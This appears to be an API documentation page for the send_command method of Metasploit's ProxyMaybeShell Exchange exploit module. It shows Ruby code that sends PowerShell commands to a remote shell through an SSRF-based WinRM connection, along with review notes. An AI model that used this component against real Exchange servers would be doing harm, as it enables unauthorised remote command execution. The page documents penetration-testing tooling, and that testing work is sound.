Module: Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell::SSRFWinRMConnection::PowerShell

Defined in:
lib/msf/core/exploit/remote/http/exchange/proxy_maybe_shell.rb


Instance Method Details

#send_command(command, _arguments) ⇒ Object



# File 'lib/msf/core/exploit/remote/http/exchange/proxy_maybe_shell.rb', line 177

# Sends +command+ to the remote shell as a pipeline message, one fragment per
# request, and returns the command id that identifies the resulting pipeline.
#
# A random upper-case UUID is generated locally and used to build the message.
# For the fragment flagged as +start_fragment+ a CreatePipeline request is sent,
# and the id is then replaced by the text of the first +CommandId+ element found
# in the response. Every other fragment is sent as a SendData request carrying
# whatever id is current at that point.
#
# The command string is handed to the message factory exactly as received; this
# method performs no escaping or validation of it.
#
# NOTE(review): if a response contains no +CommandId+ element, XPath.first
# returns nil and the +.text+ call raises NoMethodError. Nothing here rescues
# it, so callers see that error rather than a protocol-level one.
#
# @param command [String] command text placed into the pipeline message
# @param _arguments [Object] accepted but never read by this method
# @return [String] the CommandId reported by the remote end; the locally
#   generated UUID is returned only if no start fragment was yielded
def send_command(command, _arguments)
  pipeline_id = SecureRandom.uuid.to_s.upcase
  pipeline_message = MessageFactory.create_pipeline_message(@runspace_id, pipeline_id, command)

  fragmenter.fragment(pipeline_message) do |piece|
    # Rebuilt for every fragment so that later fragments pick up the id
    # assigned from the CreatePipeline response below.
    wsmv_args = [connection_opts, shell_id, pipeline_id, piece]

    if piece.start_fragment
      reply = transport.send_request(WinRM::WSMV::CreatePipeline.new(*wsmv_args).build)
      id_node = REXML::XPath.first(reply, "//*[local-name() = 'CommandId']")
      # Overwrites the outer local on purpose: the block is a closure over it.
      pipeline_id = id_node.text
    else
      transport.send_request(WinRM::WSMV::SendData.new(*wsmv_args).build)
    end
  end

  pipeline_id
end